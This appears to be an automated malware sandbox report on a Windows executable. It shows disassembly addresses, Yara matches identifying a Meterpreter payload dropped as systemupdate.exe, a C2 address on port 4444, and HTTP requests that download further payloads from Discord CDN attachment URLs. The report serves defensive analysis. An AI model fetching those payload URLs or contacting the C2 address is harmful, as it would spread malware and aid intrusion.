Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r15	0_2_00007FF75F8EB640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r15	0_2_00007FF75F900500
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	0_2_00007FF75F8FC490
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then xor eax, eax	0_2_00007FF75F8C8240
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov rax, qword ptr [rcx+10h]	0_2_00007FF75F8DC189
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 4x nop then mov eax, dword ptr [rcx]	9_2_00007FF6EC3252C0
Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 4x nop then mov eax, dword ptr [rsi]	9_2_00007FF6EC327750
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then lea rdx, qword ptr [rbp-31h]	12_2_00007FF75F98F0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbx	12_2_00007FF75F8BF096
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov r8d, dword ptr [rdx+04h]	12_2_00007FF75F8C8F80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r13	12_2_00007FF75F8FFEE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbx	12_2_00007FF75F98DE50
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	12_2_00007FF75F91ADD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	12_2_00007FF75F8E8CD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	12_2_00007FF75F962BA0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	12_2_00007FF75F8FDC00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov r8d, dword ptr [rax+r9]	12_2_00007FF75F8C3AC0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rsi]	12_2_00007FF75F8C9B10
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then mov r9d, r8d	12_2_00007FF75F937A40
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	12_2_00007FF75F98CA80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	12_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	12_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	12_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	12_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then lea edx, dword ptr [r9+r9*4]	12_2_00007FF75F8C1A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then mov rax, rcx	12_2_00007FF75F8D2A00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov rax, rcx	12_2_00007FF75F8E1940
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rcx+10h]	12_2_00007FF75F8E0870
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rcx]	12_2_00007FF75F8C6640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r15	12_2_00007FF75F8EB640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	12_2_00007FF75F960690
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r15	12_2_00007FF75F900500
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	12_2_00007FF75F944440
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	12_2_00007FF75F8FC490
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then xor eax, eax	12_2_00007FF75F8C8240
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov rax, qword ptr [rcx+10h]	12_2_00007FF75F8DC189
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then lea rdx, qword ptr [rbp-31h]	16_2_00007FF75F98F0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbx	16_2_00007FF75F8BF096
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov r8d, dword ptr [rdx+04h]	16_2_00007FF75F8C8F80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r13	16_2_00007FF75F8FFEE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbx	16_2_00007FF75F98DE50
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	16_2_00007FF75F91ADD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	16_2_00007FF75F8E8CD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	16_2_00007FF75F962BA0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	16_2_00007FF75F8FDC00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov r8d, dword ptr [rax+r9]	16_2_00007FF75F8C3AC0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rsi]	16_2_00007FF75F8C9B10
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then mov r9d, r8d	16_2_00007FF75F937A40
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	16_2_00007FF75F98CA80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	16_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	16_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	16_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	16_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then lea edx, dword ptr [r9+r9*4]	16_2_00007FF75F8C1A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then mov rax, rcx	16_2_00007FF75F8D2A00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov rax, rcx	16_2_00007FF75F8E1940
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rcx+10h]	16_2_00007FF75F8E0870
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rcx]	16_2_00007FF75F8C6640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r15	16_2_00007FF75F8EB640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	16_2_00007FF75F960690
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r15	16_2_00007FF75F900500
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	16_2_00007FF75F944440
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	16_2_00007FF75F8FC490
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then xor eax, eax	16_2_00007FF75F8C8240
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov rax, qword ptr [rcx+10h]	16_2_00007FF75F8DC189
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then lea rdx, qword ptr [rbp-31h]	19_2_00007FF75F98F0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbx	19_2_00007FF75F8BF096
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov r8d, dword ptr [rdx+04h]	19_2_00007FF75F8C8F80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r13	19_2_00007FF75F8FFEE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbx	19_2_00007FF75F98DE50
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	19_2_00007FF75F91ADD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	19_2_00007FF75F8E8CD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	19_2_00007FF75F962BA0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	19_2_00007FF75F8FDC00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov r8d, dword ptr [rax+r9]	19_2_00007FF75F8C3AC0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rsi]	19_2_00007FF75F8C9B10
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then mov r9d, r8d	19_2_00007FF75F937A40
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	19_2_00007FF75F98CA80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	19_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	19_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	19_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	19_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then lea edx, dword ptr [r9+r9*4]	19_2_00007FF75F8C1A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then mov rax, rcx	19_2_00007FF75F8D2A00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov rax, rcx	19_2_00007FF75F8E1940
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rcx+10h]	19_2_00007FF75F8E0870
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rcx]	19_2_00007FF75F8C6640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r15	19_2_00007FF75F8EB640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	19_2_00007FF75F960690
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r15	19_2_00007FF75F900500
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	19_2_00007FF75F944440
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	19_2_00007FF75F8FC490
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then xor eax, eax	19_2_00007FF75F8C8240
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov rax, qword ptr [rcx+10h]	19_2_00007FF75F8DC189
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then lea rdx, qword ptr [rbp-31h]	22_2_00007FF75F98F0C0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbx	22_2_00007FF75F8BF096
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov r8d, dword ptr [rdx+04h]	22_2_00007FF75F8C8F80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r13	22_2_00007FF75F8FFEE0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbx	22_2_00007FF75F98DE50
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	22_2_00007FF75F91ADD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	22_2_00007FF75F8E8CD0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	22_2_00007FF75F962BA0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	22_2_00007FF75F8FDC00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov r8d, dword ptr [rax+r9]	22_2_00007FF75F8C3AC0
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rsi]	22_2_00007FF75F8C9B10
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then mov r9d, r8d	22_2_00007FF75F937A40
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	22_2_00007FF75F98CA80
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	22_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	22_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	22_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	22_2_00007FF75F8FFA70
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then lea edx, dword ptr [r9+r9*4]	22_2_00007FF75F8C1A90
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then mov rax, rcx	22_2_00007FF75F8D2A00
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov rax, rcx	22_2_00007FF75F8E1940
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rcx+10h]	22_2_00007FF75F8E0870
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov eax, dword ptr [rcx]	22_2_00007FF75F8C6640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r15	22_2_00007FF75F8EB640
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rbp	22_2_00007FF75F960690
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push r15	22_2_00007FF75F900500
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rdi	22_2_00007FF75F944440
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then push rsi	22_2_00007FF75F8FC490
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 5x nop then xor eax, eax	22_2_00007FF75F8C8240
Source: C:\Users\user\Desktop\sNifdpWiY9.exe	Code function: 4x nop then mov rax, qword ptr [rcx+10h]	22_2_00007FF75F8DC189

Networking

Yara detected Meterpreter

Source: Yara match	File source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.systemupdate.exe.1de4a3d4000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 89.84.63.139

Source: global traffic

TCP traffic: 192.168.2.7:49702 -> 89.84.63.139:4444

Source: Joe Sandbox View	IP Address: 162.159.134.233 162.159.134.233
Source: Joe Sandbox View	IP Address: 162.159.134.233 162.159.134.233

Source: Joe Sandbox View

ASN Name: BOUYGTEL-ISPFR BOUYGTEL-ISPFR

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	TCP traffic detected without corresponding DNS query: 89.84.63.139
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\sNifdpWiY9.exe

Code function: 0_2_00007FF75F8B1703 InternetOpenA,InternetOpenA,GetLastError,InternetOpenUrlA,InternetOpenUrlA,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00007FF75F8B1703

Source: global traffic	HTTP traffic detected: GET /attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7& HTTP/1.1User-Agent: DownloaderHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c60&is=67512ae0&hm=8f37e08b0f9684170b94f69a0483ca1c06a0768db952c1640cf4ff676e76255b& HTTP/1.1User-Agent: DownloaderHost: cdn.discordapp.comCache-Control: no-cacheCookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A; _cfuvid=bU7nF5VnNYVA.5nawcWS8uqB9Y.KCne1Dnja3l1cffI-1733395264866-0.0.1.1-604800000
Source: global traffic	HTTP traffic detected: GET /attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7& HTTP/1.1User-Agent: DownloaderHost: cdn.discordapp.comCache-Control: no-cacheCookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A
Source: global traffic	HTTP traffic detected: GET /attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7& HTTP/1.1User-Agent: DownloaderHost: cdn.discordapp.comCache-Control: no-cacheCookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A

Source: global traffic

DNS traffic detected: DNS query: cdn.discordapp.com

Source: sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5FAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: sNifdpWiY9.exe, 00000000.00000002.1298174073.00000202F43A5000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000010.00000002.1400586061.000001F5E23DC000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000016.00000002.1482815117.00000233D5FAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: sNifdpWiY9.exe, 00000010.00000002.1400586061.000001F5E23DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/V
Source: ConDrv.0.dr, ConDrv.16.dr, ConDrv.22.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/1178810474935111690/1314084840471265371/google.bin?ex=67527c6
Source: ConDrv.22.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528
Source: sNifdpWiY9.exe, 00000000.00000003.1296804041.00000202F43A5000.00000004.00000020.00020000.00000000.sdmp, sNifdpWiY9.exe, 00000000.00000002.1298174073.00000202F43A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/n
Source: sNifdpWiY9.exe	String found in binary or memory: https://gcc.gnu.org/bugs/):

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49735 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe

Code function: 9_2_000001DE4A4178D0 calloc,CryptAcquireContextW,GetLastError,CryptGenRandom,GetLastError,CryptImportKey,free,

9_2_000001DE4A4178D0

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter payload Author: ditekSHen
Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter payload Author: ditekSHen
Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter payload Author: ditekSHen
Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPE	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter payload Author: ditekSHen
Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPE	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter payload Author: ditekSHen
Source: 9.2.systemupdate.exe.1de4a3d4000.1.unpack, type: UNPACKEDPE	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 9.2.systemupdate.exe.1de4a3d4000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter payload Author: ditekSHen
Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter payload Author: ditekSHen
Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter payload Author: ditekSHen

Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe	Code function: 9_2_000001DE4A3D9D70 NtAllocateVirtualMemory,		9_2_000001DE4A3D9D70
